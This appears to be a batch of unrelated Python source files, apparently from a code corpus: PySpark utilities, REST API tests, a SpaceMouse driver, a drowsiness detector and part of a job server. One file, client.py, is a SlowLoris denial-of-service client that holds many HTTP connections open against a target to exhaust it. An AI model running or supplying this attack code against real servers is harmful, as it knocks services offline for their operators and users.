Given a Spark version string, return the (major version number, minor version number).
E.g., for 2.0.1-SNAPSHOT, return (2, 0).
Examples
--------
>>> sparkVersion = "2.4.0"
>>> VersionUtils.majorMinorVersion(sparkVersion)
(2, 4)
>>> sparkVersion = "2.3.0-SNAPSHOT"
>>> VersionUtils.majorMinorVersion(sparkVersion)
(2, 3)
"""
m = re.search(r'^(\d+)\.(\d+)(\..*)?$', sparkVersion)
if m is not None:
return (int(m.group(1)), int(m.group(2)))
else:
raise ValueError("Spark tried to parse '%s' as a Spark" % sparkVersion +
" version string, but it could not find the major and minor" +
" version numbers.")
def fail_on_stopiteration(f):
"""
Wraps the input function to fail on 'StopIteration' by raising a 'RuntimeError'
prevents silent loss of data when 'f' is used in a for loop in Spark code
"""
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except StopIteration as exc:
raise RuntimeError(
"Caught StopIteration thrown from user's code; failing the task",
exc
)
return wrapper
def walk_tb(tb):
while tb is not None:
yield tb
tb = tb.tb_next
def try_simplify_traceback(tb):
"""
Simplify the traceback. It removes the tracebacks in the current package, and only
shows the traceback that is related to the thirdparty and user-specified codes.
Returns
-------
TracebackType or None
Simplified traceback instance. It returns None if it fails to simplify.
Notes
-----
This keeps the tracebacks once it sees they are from a different file even
though the following tracebacks are from the current package.
Examples
--------
>>> import importlib
>>> import sys
>>> import traceback
>>> import tempfile
>>> with tempfile.TemporaryDirectory() as tmp_dir:
... with open("%s/dummy_module.py" % tmp_dir, "w") as f:
... _ = f.write(
... 'def raise_stop_iteration():\\n'
... ' raise StopIteration()\\n\\n'
... 'def simple_wrapper(f):\\n'
... ' def wrapper(*a, **k):\\n'
... ' return f(*a, **k)\\n'
... ' return wrapper\\n')
... f.flush()
... spec = importlib.util.spec_from_file_location(
... "dummy_module", "%s/dummy_module.py" % tmp_dir)
... dummy_module = importlib.util.module_from_spec(spec)
... spec.loader.exec_module(dummy_module)
>>> def skip_doctest_traceback(tb):
... import pyspark
... root = os.path.dirname(pyspark.__file__)
... pairs = zip(walk_tb(tb), traceback.extract_tb(tb))
... for cur_tb, cur_frame in pairs:
... if cur_frame.filename.startswith(root):
... return cur_tb
Regular exceptions should show the file name of the current package as below.
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.raise_stop_iteration)()
... except Exception as e:
... tb = sys.exc_info()[-1]
... e.__cause__ = None
... exc_info = "".join(
... traceback.format_exception(type(e), e, tb))
>>> print(exc_info) # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
Traceback (most recent call last):
File ...
...
File "/.../pyspark/util.py", line ...
...
RuntimeError: ...
>>> "pyspark/util.py" in exc_info
True
If the traceback is simplified with this method, it hides the current package file name:
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.raise_stop_iteration)()
... except Exception as e:
... tb = try_simplify_traceback(sys.exc_info()[-1])
... e.__cause__ = None
... exc_info = "".join(
... traceback.format_exception(
... type(e), e, try_simplify_traceback(skip_doctest_traceback(tb))))
>>> print(exc_info) # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
RuntimeError: ...
>>> "pyspark/util.py" in exc_info
False
In the case below, the traceback contains the current package in the middle.
In this case, it just hides the top occurrence only.
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.simple_wrapper(
... fail_on_stopiteration(dummy_module.raise_stop_iteration)))()
... except Exception as e:
... tb = sys.exc_info()[-1]
... e.__cause__ = None
... exc_info_a = "".join(
... traceback.format_exception(type(e), e, tb))
... exc_info_b = "".join(
... traceback.format_exception(
... type(e), e, try_simplify_traceback(skip_doctest_traceback(tb))))
>>> exc_info_a.count("pyspark/util.py")
2
>>> exc_info_b.count("pyspark/util.py")
1
"""
if "pypy" in platform.python_implementation().lower():
# Traceback modification is not supported with PyPy in PySpark.
return None
if sys.version_info[:2] < (3, 7):
# Traceback creation is not supported Python < 3.7.
# See https://bugs.python.org/issue30579.
return None
import pyspark
root = os.path.dirname(pyspark.__file__)
tb_next = None
new_tb = None
pairs = zip(walk_tb(tb), traceback.extract_tb(tb))
last_seen = []
for cur_tb, cur_frame in pairs:
if not cur_frame.filename.startswith(root):
# Filter the stacktrace from the PySpark source itself.
last_seen = [(cur_tb, cur_frame)]
break
for cur_tb, cur_frame in reversed(list(itertools.chain(last_seen, pairs))):
# Once we have seen the file names outside, don't skip.
new_tb = types.TracebackType(
tb_next=tb_next,
tb_frame=cur_tb.tb_frame,
tb_lasti=cur_tb.tb_frame.f_lasti,
tb_lineno=cur_tb.tb_frame.f_lineno if cur_tb.tb_frame.f_lineno is not None else -1)
tb_next = new_tb
return new_tb
def _print_missing_jar(lib_name, pkg_name, jar_name, spark_version):
print("""
________________________________________________________________________________________________
Spark %(lib_name)s libraries not found in class path. Try one of the following.
1. Include the %(lib_name)s library and its dependencies with in the
spark-submit command as
$ bin/spark-submit --packages org.apache.spark:spark-%(pkg_name)s:%(spark_version)s ...
2. Download the JAR of the artifact from Maven Central http://search.maven.org/,
Group Id = org.apache.spark, Artifact Id = spark-%(jar_name)s, Version = %(spark_version)s.
Then, include the jar in the spark-submit command as
$ bin/spark-submit --jars <spark-%(jar_name)s.jar> ...
________________________________________________________________________________________________
""" % {
"lib_name": lib_name,
"pkg_name": pkg_name,
"jar_name": jar_name,
"spark_version": spark_version
})
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MiB
Examples
--------
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def inheritable_thread_target(f: Callable) -> Callable:
"""
Return thread target wrapper which is recommended to be used in PySpark when the
pinned thread mode is enabled. The wrapper function, before calling original
thread target, it inherits the inheritable properties specific
to JVM thread such as ``InheritableThreadLocal``.
Also, note that pinned thread mode does not close the connection from Python
to JVM when the thread is finished in the Python side. With this wrapper, Python
garbage-collects the Python thread instance and also closes the connection
which finishes JVM thread correctly.
When the pinned thread mode is off, it return the original ``f``.
.. versionadded:: 3.2.0
Parameters
----------
f : function
the original thread target.
Notes
-----
This API is experimental.
It is important to know that it captures the local properties when you decorate it
whereas :class:`InheritableThread` captures when the thread is started.
Therefore, it is encouraged to decorate it when you want to capture the local
properties.
For example, the local properties from the current Spark context is captured
when you define a function here instead of the invocation:
>>> @inheritable_thread_target
... def target_func():
... pass # your codes.
If you have any updates on local properties afterwards, it would not be reflected to
the Spark context in ``target_func()``.
The example below mimics the behavior of JVM threads as close as possible:
>>> Thread(target=inheritable_thread_target(target_func)).start() # doctest: +SKIP
"""
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer): # type: ignore[attr-defined]
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
# NOTICE the internal difference vs `InheritableThread`. `InheritableThread`
# copies local properties when the thread starts but `inheritable_thread_target`
# copies when the function is wrapped.
properties = (SparkContext
._active_spark_context # type: ignore[attr-defined]
._jsc.sc()
.getLocalProperties().clone())
@functools.wraps(f)
def wrapped(*args, **kwargs):
try:
# Set local properties in child thread.
SparkContext._active_spark_context._jsc.sc().setLocalProperties(properties)
return f(*args, **kwargs)
finally:
InheritableThread._clean_py4j_conn_for_current_thread()
return wrapped
else:
return f
class InheritableThread(threading.Thread):
"""
Thread that is recommended to be used in PySpark instead of :class:`threading.Thread`
when the pinned thread mode is enabled. The usage of this class is exactly same as
:class:`threading.Thread` but correctly inherits the inheritable properties specific
to JVM thread such as ``InheritableThreadLocal``.
Also, note that pinned thread mode does not close the connection from Python
to JVM when the thread is finished in the Python side. With this class, Python
garbage-collects the Python thread instance and also closes the connection
which finishes JVM thread correctly.
When the pinned thread mode is off, this works as :class:`threading.Thread`.
.. versionadded:: 3.1.0
Notes
-----
This API is experimental.
"""
def __init__(self, target, *args, **kwargs):
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer):
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
def copy_local_properties(*a, **k):
# self._props is set before starting the thread to match the behavior with JVM.
assert hasattr(self, "_props")
SparkContext._active_spark_context._jsc.sc().setLocalProperties(self._props)
try:
return target(*a, **k)
finally:
InheritableThread._clean_py4j_conn_for_current_thread()
super(InheritableThread, self).__init__(
target=copy_local_properties, *args, **kwargs)
else:
super(InheritableThread, self).__init__(target=target, *args, **kwargs)
def start(self, *args, **kwargs):
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer):
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
# Local property copy should happen in Thread.start to mimic JVM's behavior.
self._props = SparkContext._active_spark_context._jsc.sc().getLocalProperties().clone()
return super(InheritableThread, self).start(*args, **kwargs)
@staticmethod
def _clean_py4j_conn_for_current_thread():
from pyspark import SparkContext
jvm = SparkContext._jvm
thread_connection = jvm._gateway_client.get_thread_connection()
if thread_connection is not None:
try:
# Dequeue is shared across other threads but it's thread-safe.
# If this function has to be invoked one more time in the same thead
# Py4J will create a new connection automatically.
jvm._gateway_client.deque.remove(thread_connection)
except ValueError:
# Should never reach this point
return
finally:
thread_connection.close()
if __name__ == "__main__":
if "pypy" not in platform.python_implementation().lower() and sys.version_info[:2] >= (3, 7):
import doctest
import pyspark.util
from pyspark.context import SparkContext
globs = pyspark.util.__dict__.copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(pyspark.util, globs=globs)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
|
test_application.py
|
#
# This file is part of Python-REST. Python-REST is free software that is
# made available under the MIT license. Consult the file "LICENSE" that is
# distributed together with this file for the exact licensing terms.
#
# Python-REST is copyright (c) 2010 by the Python-REST authors. See the file
# "AUTHORS" for a complete overview.
import sys
import time
import logging
import httplib as http
from threading import Thread
from httplib import HTTPConnection
from xml.etree import ElementTree as etree
from xml.etree.ElementTree import XML, Element
from rest import Application, Collection, Resource
from rest.api import request, response, mapper
from rest.server import make_server
class BookCollection(Collection):
name = 'books'
contains = 'book'
entity_transform = """
$!type <=> $!type
$id:int <=> $id
$title <=> $title
$reviews <= $reviews
"""
def __init__(self):
self.books = []
self.books.append(Resource('book', { 'id': '1', 'title': 'Book Number 1' } ))
self.books.append(Resource('book', { 'id': '2', 'title': 'Book Number 1' } ))
self.books.append(Resource('book', { 'id': '3', 'title': 'Book Number 1' } ))
def _get_book(self, id):
for book in self.books:
if book['id'] == id:
return book
def show(self, id):
book = self._get_book(id)
if not book:
raise KeyError
return book
def list(self, **kwargs):
match = []
id = kwargs.get('id')
detail = kwargs.get('detail')
for book in self.books:
if id and book['id'] != id:
continue
book = book.copy()
if detail == '2':
book['reviews'] = [Resource('review',
{ 'comment': 'Very good' })]
match.append(book)
return match
def create(self, input):
self.books.append(input)
url = mapper.url_for(collection=self.name, action='show',
id=input['id'])
return url
def update(self, id, input):
book = self._get_book(id)
if not book:
raise KeyError
book.update(input)
def delete(self, id):
book = self._get_book(id)
if not book:
raise KeyError
self.books.remove(book)
class BookApplication(Application):
def setup_collections(self):
self.add_collection(BookCollection())
class TestApplication(object):
@classmethod
def setUpClass(cls):
# Make sure we get some logs on standard output.
level = logging.DEBUG
logger = logging.getLogger('rest')
handler = logging.StreamHandler(sys.stdout)
format = '%(levelname)s [%(name)s] %(message)s'
formatter = logging.Formatter(format)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(level)
def setUp(self):
self.server = make_server('localhost', 0, BookApplication)
# don't want any logging
self.server.RequestHandlerClass.log_request = lambda *args: None
self.thread = Thread(target=self.server.serve_forever)
self.thread.start()
time.sleep(0.5) # make sure server is started up
address = self.server.socket.getsockname()
self.client = HTTPConnection(*address)
def tearDown(self):
self.server.shutdown()
self.thread.join()
def test_show(self):
client = self.client
client.request('GET', '/api/books/1')
response = client.getresponse()
assert response.status == http.OK
assert response.getheader('Content-Type') == 'text/xml; charset=utf-8'
xml = etree.fromstring(response.read())
assert etree.tostring(xml) == \
'<book>\n <id>1</id>\n <title>Book Number 1</title>\n</book>'
def test_show_not_found(self):
client = self.client
client.request('GET', '/api/books/4')
response = client.getresponse()
assert response.status == http.NOT_FOUND
def test_show_with_input(self):
client = self.client
client.request('GET', '/api/books/1', 'body input')
response = client.getresponse()
assert response.status == http.BAD_REQUEST
def test_list(self):
client = self.client
client.request('GET', '/api/books')
response = client.getresponse()
assert response.status == http.OK
assert response.getheader('Content-Type') == 'text/xml; charset=utf-8'
xml = etree.fromstring(response.read())
assert len(xml.findall('.//id')) == 3
def test_list_with_input(self):
client = self.client
client.request('GET', '/api/books', 'body input')
response = client.getresponse()
assert response.status == http.BAD_REQUEST
def test_list_with_filter(self):
client = self.client
client.request('GET', '/api/books?id=2')
response = client.getresponse()
assert response.status == http.OK
assert response.getheader('Content-Type') == 'text/xml; charset=utf-8'
xml = etree.fromstring(response.read())
assert len(xml.findall('.//id')) == 1
def test_create(self):
client = self.client
book = XML('<book><id>4</id><title>Book Number 4</title></book>')
headers = { 'Content-Type': 'text/xml' }
client.request('POST', '/api/books', etree.tostring(book), headers)
response = client.getresponse()
assert response.status == http.CREATED
assert response.getheader('Location').endswith('/api/books/4')
def test_create_no_input(self):
client = self.client
client.request('POST', '/api/books')
response = client.getresponse()
assert response.status == http.BAD_REQUEST
def test_create_wrong_content_type(self):
client = self.client
book = '<book><id>4</id><title>Book Number 4</title></book>'
headers = { 'Content-Type': 'text/plain' }
client.request('POST', '/api/books', book, headers)
response = client.getresponse()
assert response.status == http.UNSUPPORTED_MEDIA_TYPE
def test_delete(self):
client = self.client
client.request('DELETE', '/api/books/1')
response = client.getresponse()
assert response.status == http.NO_CONTENT
def test_delete_non_existent(self):
client = self.client
client.request('DELETE', '/api/books/4')
response = client.getresponse()
assert response.status == http.NOT_FOUND
def test_delete_with_input(self):
client = self.client
client.request('DELETE', '/api/books/4', 'input')
response = client.getresponse()
assert response.status == http.BAD_REQUEST
def test_update(self):
client = self.client
book = XML('<book><id>1</id><title>Book Number 2</title></book>')
headers = { 'Content-Type': 'text/xml' }
client.request('PUT', '/api/books/1', etree.tostring(book), headers)
response = client.getresponse()
assert response.status == http.NO_CONTENT
def test_update_without_input(self):
client = self.client
headers = { 'Content-Type': 'text/xml' }
client.request('PUT', '/api/books/1', '', headers)
response = client.getresponse()
assert response.status == http.BAD_REQUEST
def test_update_with_wrong_content_type(self):
client = self.client
book = '<book><id>1</id><title>Book Number 2</title></book>'
headers = { 'Content-Type': 'text/plain' }
client.request('PUT', '/api/books/1', book, headers)
response = client.getresponse()
assert response.status == http.UNSUPPORTED_MEDIA_TYPE
def test_update_non_existent(self):
client = self.client
book = XML('<book><id>1</id><title>Book Number 2</title></book>')
headers = { 'Content-Type': 'text/xml' }
client.request('PUT', '/api/books/4', etree.tostring(book), headers)
response = client.getresponse()
assert response.status == http.NOT_FOUND
def test_wrong_methods(self):
client = self.client
client.request('PUT', '/api/books')
response = client.getresponse()
assert response.status == http.METHOD_NOT_ALLOWED
allowed = set(response.getheader('Allowed').split(', '))
assert allowed == set(['GET', 'POST'])
client.request('DELETE', '/api/books')
response = client.getresponse()
assert response.status == http.METHOD_NOT_ALLOWED
allowed = set(response.getheader('Allowed').split(', '))
assert allowed == set(['GET', 'POST'])
client.request('POST', '/api/books/1')
response = client.getresponse()
assert response.status == http.METHOD_NOT_ALLOWED
allowed = set(response.getheader('Allowed').split(', '))
assert allowed == set(['GET', 'DELETE', 'PUT'])
|
spacemouse.py
|
"""Driver class for SpaceMouse controller.
This class provides a driver support to SpaceMouse on Mac OS X.
In particular, we assume you are using a SpaceMouse Wireless by default.
To set up a new SpaceMouse controller:
1. Download and install driver from https://www.3dconnexion.com/service/drivers.html
2. Install hidapi library through pip
(make sure you run uninstall hid first if it is installed).
3. Make sure SpaceMouse is connected before running the script
4. (Optional) Based on the model of SpaceMouse, you might need to change the
vendor id and product id that correspond to the device.
For Linux support, you can find open-source Linux drivers and SDKs online.
See http://spacenav.sourceforge.net/
"""
import time
import threading
from collections import namedtuple
import numpy as np
try:
import hid
except ModuleNotFoundError as exc:
raise ImportError("Unable to load module hid, required to interface with SpaceMouse. "
"Only Mac OS X is officially supported. Install the additional "
"requirements with `pip install -r requirements-ik.txt`") from exc
from ..utils.transform_utils import rotation_matrix
from . import Device
AxisSpec = namedtuple("AxisSpec", ["channel", "byte1", "byte2", "scale"])
SPACE_MOUSE_SPEC = {
"x": AxisSpec(channel=1, byte1=1, byte2=2, scale=1),
"y": AxisSpec(channel=1, byte1=3, byte2=4, scale=-1),
"z": AxisSpec(channel=1, byte1=5, byte2=6, scale=-1),
"roll": AxisSpec(channel=1, byte1=7, byte2=8, scale=-1),
"pitch": AxisSpec(channel=1, byte1=9, byte2=10, scale=-1),
"yaw": AxisSpec(channel=1, byte1=11, byte2=12, scale=1),
}
def to_int16(y1, y2):
"""Convert two 8 bit bytes to a signed 16 bit integer."""
x = (y1) | (y2 << 8)
if x >= 32768:
x = -(65536 - x)
return x
def scale_to_control(x, axis_scale=350., min_v=-1.0, max_v=1.0):
"""Normalize raw HID readings to target range."""
x = x / axis_scale
x = min(max(x, min_v), max_v)
return x
def convert(b1, b2):
"""Converts SpaceMouse message to commands."""
return scale_to_control(to_int16(b1, b2))
class SpaceMouse(Device):
"""A minimalistic driver class for SpaceMouse with HID library."""
def __init__(self,
vendor_id=9583,
product_id=50735,
pos_sensitivity=1.0,
rot_sensitivity=1.0
):
"""Initialize a SpaceMouse handler.
Args:
vendor_id: HID device vendor id
product_id: HID device product id
pos_sensitivity: Magnitude of input position command scaling
rot_sensitivity: Magnitude of scale input rotation commands scaling
Note:
Use hid.enumerate() to view all USB human interface devices (HID).
Make sure SpaceMouse is detected before running the script.
You can look up its vendor/product id from this method.
"""
print("Opening SpaceMouse device")
self.device = hid.device()
self.device.open(vendor_id, product_id) # SpaceMouse
self.pos_sensitivity = pos_sensitivity
self.rot_sensitivity = rot_sensitivity
print("Manufacturer: %s" % self.device.get_manufacturer_string())
print("Product: %s" % self.device.get_product_string())
self._display_controls()
self.single_click_and_hold = False
self._control = [0., 0., 0., 0., 0., 0.]
self._reset_state = 0
self.rotation = np.array([[-1., 0., 0.], [0., 1., 0.], [0., 0., -1.]])
self._enabled = False
# launch a new listener thread to listen to SpaceMouse
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
def _display_controls(self):
"""
Method to pretty print controls.
"""
def print_command(char, info):
char += " " * (30 - len(char))
print("{}\t{}".format(char, info))
print("")
print_command("Control", "Command")
print_command("Right button", "reset simulation")
print_command("Left button (hold)", "close gripper")
print_command("Move mouse laterally", "move arm horizontally in x-y plane")
print_command("Move mouse vertically", "move arm vertically")
print_command(
"Twist mouse about an axis", "rotate arm about a corresponding axis"
)
print_command("ESC", "quit")
print("")
def _reset_internal_state(self):
"""
Resets internal state of controller, except for the reset signal.
"""
self.rotation = np.array([[-1., 0., 0.], [0., 1., 0.], [0., 0., -1.]])
def start_control(self):
"""
Method that should be called externally before controller can
start receiving commands.
"""
self._reset_internal_state()
self._reset_state = 0
self._enabled = True
def get_controller_state(self):
"""Returns the current state of the 3d mouse, a dictionary of pos, orn, grasp, and reset."""
dpos = self.control[:3] * 0.005 * self.pos_sensitivity
roll, pitch, yaw = self.control[3:] * 0.005 * self.rot_sensitivity
self.grasp = self.control_gripper
# convert RPY to an absolute orientation
drot1 = rotation_matrix(angle=-pitch, direction=[1., 0, 0], point=None)[:3, :3]
drot2 = rotation_matrix(angle=roll, direction=[0, 1., 0], point=None)[:3, :3]
drot3 = rotation_matrix(angle=yaw, direction=[0, 0, 1.], point=None)[:3, :3]
self.rotation = self.rotation.dot(drot1.dot(drot2.dot(drot3)))
return dict(
dpos=dpos,
rotation=self.rotation,
raw_drotation=np.array([roll, pitch, yaw]),
grasp=self.grasp,
reset=self._reset_state
)
def run(self):
"""Listener method that keeps pulling new messages."""
t_last_click = -1
while True:
d = self.device.read(13)
if d is not None and self._enabled:
if d[0] == 1: ## readings from 6-DoF sensor
self.y = convert(d[1], d[2])
self.x = convert(d[3], d[4])
self.z = convert(d[5], d[6]) * -1.0
self.roll = convert(d[7], d[8])
self.pitch = convert(d[9], d[10])
self.yaw = convert(d[11], d[12])
self._control = [
self.x,
self.y,
self.z,
self.roll,
self.pitch,
self.yaw,
]
elif d[0] == 3: ## readings from the side buttons
# press left button
if d[1] == 1:
t_click = time.time()
elapsed_time = t_click - t_last_click
t_last_click = t_click
self.single_click_and_hold = True
# release left button
if d[1] == 0:
self.single_click_and_hold = False
# right button is for reset
if d[1] == 2:
self._reset_state = 1
self._enabled = False
self._reset_internal_state()
@property
def control(self):
"""Returns 6-DoF control."""
return np.array(self._control)
@property
def control_gripper(self):
"""Maps internal states into gripper commands."""
if self.single_click_and_hold:
return 1.0
return 0
if __name__ == "__main__":
space_mouse = SpaceMouse()
for i in range(100):
print(space_mouse.control, space_mouse.control_gripper)
time.sleep(0.02)
|
client.py
|
"""This module implements the SlowLoris client."""
import threading
import time
from .connection import LorisConnection
from .user_agent import get_random_user_agent
class LorisClient:
"""SlowLoris attack client."""
def __init__(self,client_ips=[]):
self.targets = []
self.client_ips = []
self.keepalive_thread = threading.Thread(target=self.keep_alive)
self.keepalive_thread.setDaemon(True)
self.keepalive_thread.start()
self.client_ips = client_ips
print("\n\n\n Here ",client_ips[0])
def attack(self, target):
"""Starts the attack."""
self.targets.append(target)
print("[{}] Initializing {} connections.".format(target.host, target.count))
# Start 'count' connections and send the initial HTTP headers.
for i in range(target.count):
conn = LorisConnection(target,self.client_ips, True).send_headers(get_random_user_agent())
target.connections.insert(0, conn)
if i == target.count - 1:
print("[{}] All connections initialized.".format(target.host))
def stop(self):
"""Stops the attack."""
for target in self.targets:
print("[{}] Shutting down all connections.".format(target.host))
for conn in target.connections:
conn.close()
def keep_alive(self):
"""Keeps all targets alive and maintains their connections."""
while True:
time.sleep(2)
# Iterate over all targets.
for target in self.targets:
self.keep_target_alive(target)
def keep_target_alive(self, target):
"""Keeps a target alive and maintains its connections."""
# Print latest latency.
latency = target.get_latency()
if latency != None:
print("[{}] Current latency: {:.2f} ms".format(target.host, latency))
connection_count = len(target.connections)
# Every 10 seconds, send HTTP nonsense to prevent the connection from timing out.
for i in range(0, connection_count):
try:
target.connections[i].keep_alive()
# If the server closed one of our connections,
# re-open the connection in its place.
except: # pylint: disable=bare-except
# Notify the user that the host started dropping connections
# if this connection was the first one being dropped.
if target.dropped_connections == 0:
print("[{}] Server started dropping connections.".format(target.host))
target.dropped_connections += 1
# Notify the user about the amount of reconnections.
threshold = 10
if target.reconnections >= threshold:
print("[{}] Reconnected {} dropped connections."
.format(target.host, target.reconnections))
target.reconnections = 0
# Reconnect the socket.
conn = LorisConnection(target,self.client_ips).send_headers(get_random_user_agent())
if conn.is_connected:
target.connections[i] = conn
target.reconnections += 1
|
detect_drowsiness.py
|
import cv2
import numpy as np
from keras.models import load_model
from keras.preprocessing.image import img_to_array
from playsound import playsound
from threading import Thread
def start_alarm(sound):
"""Play the alarm sound"""
playsound('data/alarm.mp3')
classes = ['Closed', 'Open']
face_cascade = cv2.CascadeClassifier("data/haarcascade_frontalface_default.xml")
left_eye_cascade = cv2.CascadeClassifier("data/haarcascade_lefteye_2splits.xml")
right_eye_cascade = cv2.CascadeClassifier("data/haarcascade_righteye_2splits.xml")
cap = cv2.VideoCapture(0)
model = load_model("drowiness_new7.h5")
count = 0
alarm_on = False
alarm_sound = "data/alarm.mp3"
status1 = ''
status2 = ''
while True:
_, frame = cap.read()
height = frame.shape[0]
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 1)
roi_gray = gray[y:y+h, x:x+w]
roi_color = frame[y:y+h, x:x+w]
left_eye = left_eye_cascade.detectMultiScale(roi_gray)
right_eye = right_eye_cascade.detectMultiScale(roi_gray)
for (x1, y1, w1, h1) in left_eye:
cv2.rectangle(roi_color, (x1, y1), (x1 + w1, y1 + h1), (0, 255, 0), 1)
eye1 = roi_color[y1:y1+h1, x1:x1+w1]
eye1 = cv2.resize(eye1, (145, 145))
eye1 = eye1.astype('float') / 255.0
eye1 = img_to_array(eye1)
eye1 = np.expand_dims(eye1, axis=0)
pred1 = model.predict(eye1)
status1=np.argmax(pred1)
#print(status1)
#status1 = classes[pred1.argmax(axis=-1)[0]]
break
for (x2, y2, w2, h2) in right_eye:
cv2.rectangle(roi_color, (x2, y2), (x2 + w2, y2 + h2), (0, 255, 0), 1)
eye2 = roi_color[y2:y2 + h2, x2:x2 + w2]
eye2 = cv2.resize(eye2, (145, 145))
eye2 = eye2.astype('float') / 255.0
eye2 = img_to_array(eye2)
eye2 = np.expand_dims(eye2, axis=0)
pred2 = model.predict(eye2)
status2=np.argmax(pred2)
#print(status2)
#status2 = classes[pred2.argmax(axis=-1)[0]]
break
# If the eyes are closed, start counting
if status1 == 2 and status2 == 2:
#if pred1 == 2 and pred2 == 2:
count += 1
cv2.putText(frame, "Eyes Closed, Frame count: " + str(count), (10, 30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 1)
# if eyes are closed for 10 consecutive frames, start the alarm
if count >= 10:
cv2.putText(frame, "Drowsiness Alert!!!", (100, height-20), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 2)
if not alarm_on:
alarm_on = True
# play the alarm sound in a new thread
t = Thread(target=start_alarm, args=(alarm_sound,))
t.daemon = True
t.start()
else:
cv2.putText(frame, "Eyes Open", (10, 30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 1)
count = 0
alarm_on = False
cv2.imshow("Drowsiness Detector", frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
CorrelationNetworkServer.py
|
import os, random, binascii, json, subprocess, configparser
import datetime as dt
from queue import Queue
import threading
from threading import Thread
import pony.orm as pny
import rpyc
from rpyc.utils.server import ThreadedServer
import Datasets
# Parse config
config = configparser.ConfigParser()
#config.read('../../config.ini')
config.read(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir, 'config.ini'))
#db = pny.Database("sqlite", "correlation_network_jobs.db", create_db=True)
db = pny.Database('mysql', host=config['general']['host'].strip("'"), user=config['general']['user'].strip("'"), passwd=config['general']['pass'].strip("'"), db=config['general']['db'].strip("'"))
# Get directory of writing data file to
# Data directory is located at the web root's /data/cornea/jobs
# Current file directory is located at the web root's /lib/corx
data_dir = os.path.join(os.path.abspath(__file__ + "/../../../"), 'data', 'cornea', 'jobs')
# Try making the data directory first
try:
os.makedirs(data_dir)
except:
pass
# noinspection PyClassHasNoInit
# Job statuses
class JobStatus:
Submitted, Running, Done, Error, Expired = range(1, 6)
class CorrelationNetworkJob(db.Entity):
# Basic job data
dataset = pny.Required(str)
candidates = pny.Optional(str)
columns = pny.Optional(str)
verbose = pny.Required(bool, default=False)
threshold = pny.Required(float)
minimum_cluster_size = pny.Required(int)
submit_time = pny.Required(dt.datetime, sql_default='CURRENT_TIMESTAMP')
start_time = pny.Optional(dt.datetime)
end_time = pny.Optional(dt.datetime)
# Timepoints
time_elapsed_loading_data = pny.Optional(float)
time_elapsed_cleaning_data = pny.Optional(float)
time_elapsed_calculating_pairs = pny.Optional(float)
time_elapsed_nodes_edges = pny.Optional(float)
time_elapsed_node_clustering = pny.Optional(float)
time_elapsed_squarified_treemap = pny.Optional(float)
time_elapsed_fruchterman_reingold_layout = pny.Optional(float)
# Counts
edge_count = pny.Optional(int)
node_count = pny.Optional(int)
cluster_count = pny.Optional(int)
# Last completed step
last_completed_step = pny.Required(int, default=0)
# Status
status = pny.Required(int, default=JobStatus.Submitted)
status_reason = pny.Optional(str)
# Access counters
view_count = pny.Required(int, default=0)
download_count = pny.Required(int, default=0)
# Identifiers
owner = pny.Optional(str)
owner_salt = pny.Optional(str)
hash_id = pny.Required(str)
# Standard job
standard_job = pny.Required(int, default=0)
db.generate_mapping(create_tables=False)
class RPYCServer:
@pny.db_session
def __init__(self, server_lock):
self.server_lock = server_lock
running_jobs = pny.select(job for job in CorrelationNetworkJob if job.status == JobStatus.Running)
for job in running_jobs:
# Remove the out_file of the job if it exists.
try:
os.remove(os.path.join(data_dir, "{0}.json.gz".format(job.hash_id)))
except:
pass
finally:
job.status = JobStatus.Error
job.status_reason = "unexpected_server_crash"
submitted_jobs = pny.select(j for j in CorrelationNetworkJob
if j.status == JobStatus.Submitted).order_by(CorrelationNetworkJob.submit_time.asc)
self.queue = Queue()
for job in submitted_jobs:
self.queue.put(job.id)
@pny.db_session
def submit_job(self, dataset, candidates, columns, verbose, threshold, minimum_cluster_size, owner, owner_salt):
# Generate 16bit hash
hash_id = binascii.b2a_hex(os.urandom(16)).decode('utf-8');
# Store columns by index to save space
_dataset = Datasets.all_by_name[dataset]
column_indexes = []
if (columns != ''):
for c in columns.split(','):
column_indexes.append(_dataset.columns.index(c))
# Create job
job = CorrelationNetworkJob(dataset=dataset, candidates=candidates, columns=','.join(str(x) for x in column_indexes), verbose=verbose,
threshold=threshold, minimum_cluster_size=minimum_cluster_size, owner=owner, owner_salt=owner_salt, hash_id=hash_id)
try:
self.server_lock.acquire()
pny.commit()
self.queue.put(job.id)
return "{{\"job_hash_id\": \"{0}\", \"job_owner\": \"{1}\"}}".format(hash_id, owner);
except:
raise
finally:
self.server_lock.release()
@staticmethod
@pny.db_session
def job_status(job_hash_id):
job = pny.get(j for j in CorrelationNetworkJob if j.hash_id == job_hash_id)
